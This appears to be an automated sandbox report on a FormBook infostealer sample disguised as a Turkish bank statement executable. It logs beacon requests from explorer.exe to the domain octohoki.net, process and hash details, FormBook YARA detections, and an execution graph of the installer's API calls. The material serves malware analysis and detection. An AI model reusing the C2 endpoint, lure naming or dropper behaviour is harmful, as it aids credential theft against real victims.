                                                                                            Feb 18, 2023 13:07:08.527633905 CET161INHTTP/1.1 405 Not Allowed
                                                                                            Date: Sat, 18 Feb 2023 12:07:08 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 154
                                                                                            Connection: close
                                                                                            Server: namecheap-nginx
                                                                                            Allow: GET, HEAD
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            9192.168.2.349709198.54.117.21680C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:07:11.131993055 CET162OUTGET /ghii/?9WI6t=QaRcz&Y5=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIlepjy8LvksxZfxg== HTTP/1.1
                                                                                            Host: www.octohoki.net
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:13:04:43
                                                                                            Start date:18/02/2023
                                                                                            Path:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
                                                                                            Imagebase:0x400000
                                                                                            File size:388797 bytes
                                                                                            MD5 hash:CE02E10BF8DE65619AE4296D38288219
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:13:04:44
                                                                                            Start date:18/02/2023
                                                                                            Path:C:\Users\user\AppData\Local\Temp\cmezd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\cmezd.exe" C:\Users\user\AppData\Local\Temp\lrqaxxyu.p
                                                                                            Imagebase:0x1350000
                                                                                            File size:329728 bytes
                                                                                            MD5 hash:A970E84ACDE64C70D2FFD66BACBAC590
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 13%, ReversingLabs
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:13:04:44
                                                                                            Start date:18/02/2023
                                                                                            Path:C:\Users\user\AppData\Local\Temp\cmezd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\cmezd.exe
                                                                                            Imagebase:0x1350000
                                                                                            File size:329728 bytes
                                                                                            MD5 hash:A970E84ACDE64C70D2FFD66BACBAC590
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            Reputation:low

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:13:04:48
                                                                                            Start date:18/02/2023
                                                                                            Path:C:\Windows\explorer.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                            Imagebase:0x7ff69fe90000
                                                                                            File size:3933184 bytes
                                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:13:05:02
                                                                                            Start date:18/02/2023
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Imagebase:0xd90000
                                                                                            File size:61952 bytes
                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            Reputation:high

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:15.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:16.4%
                                                                                              Total number of Nodes:1385
                                                                                              Total number of Limit Nodes:25
                                                                                              execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 